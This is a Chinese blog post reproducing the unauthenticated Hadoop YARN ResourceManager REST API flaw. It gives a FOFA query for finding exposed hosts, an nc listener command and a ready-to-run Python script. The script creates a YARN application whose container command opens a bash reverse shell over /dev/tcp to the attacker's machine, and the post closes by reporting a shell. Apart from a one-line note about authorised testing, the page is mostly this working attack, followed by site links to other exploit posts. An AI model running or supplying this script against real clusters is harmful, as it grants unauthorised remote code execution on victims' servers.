-Hadoop Restful API未授权

05410

本文转载于公众号:融云攻防实验室,原文地址:

漏洞复现-Hadoop Restful API未授权

0x01 阅读须知

资源来源于网络,安全小天地只是再次进行分享,使用请遵循本站的免责申明

0x02 漏洞描述

Hadoop是一个由Apache基金会所开发的分布式系统基础架构,Hadoop通过ResourceManager REST API,可以让⽤户获取集群的相关信息。但是存在未授权接⼝:/ws/v1/cluster/apps/new-application和/ws/v1/cluster/apps,可以让⽤户⽣成并启动⼀个新的应⽤程序,在集群上进⾏处理,攻击者利用Hadoop Yarn资源管理系统REST API未授权漏洞对服务器进行攻击,可以在未授权的情况下远程执行代码。

图片[1]--Hadoop Restful API未授权-安全小天地

0x03 漏洞复现

漏洞影响:Hadoop

FOFA:“Hadoop”

1.nc监听7777端口

nc.exe -lvvp 7777
图片[2]--Hadoop Restful API未授权-安全小天地

1.python3执行脚本


#!/usr/bin/env python

import requests

target = \'http://x.x.x.x:8088/\'# 受害者机器
lhost = \'x.x.x.x\' # 你的监听ip

url = target + \'ws/v1/cluster/apps/new-application\'
resp = requests.post(url)
app_id = resp.json()[\'application-id\']
url = target + \'ws/v1/cluster/apps\'
data = {
    \'application-id\': app_id,
    \'application-name\': \'get-shell\',
    \'am-container-spec\': {
        \'commands\': {
            \'command\': \'/bin/bash -i >& /dev/tcp/%s/7777 0>&1\' % lhost,# 监听端口
        },
    },
    \'application-type\': \'YARN\',
}
requests.post(url, json=data)
图片[3]--Hadoop Restful API未授权-安全小天地

3.得到一个shell

图片[4]--Hadoop Restful API未授权-安全小天地
(注:要在正规授权情况下测试网站:日站不规范,亲人泪两行)
------本文已结束,感谢您的阅读------
THE END
技术教程
# 漏洞复现# hadoop# api# API未授权# restful
喜欢就支持一下吧
点赞10 分享
C语言教程的头像,网络安全爱好者中心-神域博客网
漏洞复现 深信服下一代防火墙NGAF login远程命令执行漏洞,网络安全爱好者中心-神域博客网
漏洞复现 深信服下一代防火墙NGAF login远程命令执行漏洞
漏洞复现 深信服下一代防火墙NGAF login远程命令执行漏洞
7个月前 407
记一次常规安全监测发现的挂马暗链,网络安全爱好者中心-神域博客网
记一次常规安全监测发现的挂马暗链
记一次常规安全监测发现的挂马暗链
7个月前 294
漏洞复现 JeecgBoot 企业级低代码平台 qurestSql SQL注入漏洞,网络安全爱好者中心-神域博客网
漏洞复现 JeecgBoot 企业级低代码平台 qurestSql SQL注入漏洞
漏洞复现 JeecgBoot 企业级低代码平台 qurestSql SQL注入漏洞
7个月前 272
【漏洞复现】WinRAR代码执行漏洞CVE-2023-38831复现【附exp】,网络安全爱好者中心-神域博客网
【漏洞复现】WinRAR代码执行漏洞CVE-2023-38831复现【附exp】
【漏洞复现】WinRAR代码执行漏洞CVE-2023-38831复现【附exp】
7个月前 271
金蝶OA Apusic应用服务器(中间件) server_file 目录遍历漏洞,网络安全爱好者中心-神域博客网
金蝶OA Apusic应用服务器(中间件) server_file 目录遍历漏洞
金蝶OA Apusic应用服务器(中间件) server_file 目录遍历漏洞
7个月前 239
Chaitin/xray1.9.3最新社区高级版 包含722POC 附license,网络安全爱好者中心-神域博客网
Chaitin/xray1.9.3最新社区高级版 包含722POC 附license
Chaitin/xray1.9.3最新社区高级版 包含722POC 附license
7个月前 208
相关推荐
漏洞复现 深信服下一代防火墙NGAF login远程命令执行漏洞,网络安全爱好者中心-神域博客网
漏洞复现 深信服下一代防火墙NGAF login远程命令执行漏洞
漏洞复现 深信服下一代防火墙NGAF login远程命令执行漏洞
7个月前 407
记一次常规安全监测发现的挂马暗链,网络安全爱好者中心-神域博客网
记一次常规安全监测发现的挂马暗链
记一次常规安全监测发现的挂马暗链
7个月前 294
漏洞复现 JeecgBoot 企业级低代码平台 qurestSql SQL注入漏洞,网络安全爱好者中心-神域博客网
漏洞复现 JeecgBoot 企业级低代码平台 qurestSql SQL注入漏洞
漏洞复现 JeecgBoot 企业级低代码平台 qurestSql SQL注入漏洞
7个月前 272
【漏洞复现】WinRAR代码执行漏洞CVE-2023-38831复现【附exp】,网络安全爱好者中心-神域博客网
【漏洞复现】WinRAR代码执行漏洞CVE-2023-38831复现【附exp】
【漏洞复现】WinRAR代码执行漏洞CVE-2023-38831复现【附exp】
7个月前 271
金蝶OA Apusic应用服务器(中间件) server_file 目录遍历漏洞,网络安全爱好者中心-神域博客网
金蝶OA Apusic应用服务器(中间件) server_file 目录遍历漏洞
金蝶OA Apusic应用服务器(中间件) server_file 目录遍历漏洞
7个月前 239
H3C SecPath运维审计系统 任意用户登录漏洞,网络安全爱好者中心-神域博客网
H3C SecPath运维审计系统 任意用户登录漏洞
H3C SecPath运维审计系统 任意用户登录漏洞
7个月前 122
评论 抢沙发
头像
善语结善缘,恶语伤人心
提交
头像

昵称

取消
昵称

请填写用户信息:

  • 昵称(必填)
  • 邮箱(必填)
常用语
请选择评论常用语:
  • 1、谢谢博主分享!
  • 2、博主NB,666
  • 3、感谢楼主分享!
  • 4、感谢大佬分享!
  • 5、教程很好用,谢谢!
 夸夸
夸夸
还有吗!没看够!
表情
[aoman][baiyan][bishi][bizui][cahan][ciya][dabing][daku][deyi][doge][fadai][fanu][fendou][ganga][guzhang][haixiu][hanxiao][zuohengheng][zhuakuang][zhouma][zhemo][zhayanjian][zaijian][yun][youhengheng][yiwen][yinxian][xu][xieyanxiao][xiaoku][xiaojiujie][xia][wunai][wozuimei][weixiao][weiqu][tuosai][tu][touxiao][tiaopi][shui][se][saorao][qiudale][qinqin][qiaoda][piezui][penxue][nanguo][liulei][liuhan][lenghan][leiben][kun][kuaikule][ku][koubi][kelian][keai][jingya][jingxi][jingkong][jie][huaixiao][haqian][aini][OK][qiang][quantou][shengli][woshou][gouyin][baoquan][aixin][bangbangtang][xiaoyanger][xigua][hexie][pijiu][lanqiu][juhua][hecai][haobang][caidao][baojin][chi][dan][kulou][shuai][shouqiang][yangtuo][youling]
图片

    暂无评论内容